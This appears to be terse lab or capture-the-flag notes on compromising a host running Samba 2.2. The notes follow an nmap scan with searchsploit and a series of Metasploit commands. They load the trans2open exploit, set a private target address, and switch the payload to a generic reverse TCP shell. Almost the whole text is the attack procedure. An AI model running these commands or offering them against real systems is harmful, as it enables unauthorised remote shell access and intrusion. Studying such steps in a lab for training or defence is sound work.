Analysis nmap scanning result.
searchsploit samba 2.2
msfconsole search trans2open use exploit/linux/samba/trans2open show options
set rhost 192.168.2.28 show targets exploit
We need change the payload setting.
show options set payload generic/shell_reverse_tcp exploit